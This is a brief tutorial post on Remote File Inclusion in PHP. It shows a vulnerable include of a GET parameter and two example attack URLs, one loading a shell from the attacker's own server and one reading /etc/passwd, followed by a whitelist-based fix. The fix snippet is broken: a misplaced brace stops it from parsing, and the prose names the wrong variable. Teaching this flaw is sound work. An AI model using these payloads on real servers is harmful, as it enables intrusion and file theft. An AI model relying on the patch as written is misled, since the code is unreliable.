Remote File Inclusion

Take a look of the following code:


[...]

include($_GET['pag']);

[...]

?>

As we can see, $page is not validated before being used so a malicious user could
include or call (as you prefer to say) his script via the browser and gain access
to the machine or view, as before, a file.

Example one: (gain access to the machine)

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Example two: (view files)

http://remote_host/inc.php?pag=/etc/passwd


Patching

The solution? validate the input. One of lots of methods to validate inputs
would be to create a list of acceptable pages as shown below:


$pag = $_GET['pag'];

$pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');

if(in_array($pag, $pages))
{
include($pag);
{
else
{
die("Hacking Attempt!");
}

Posted in: tutorial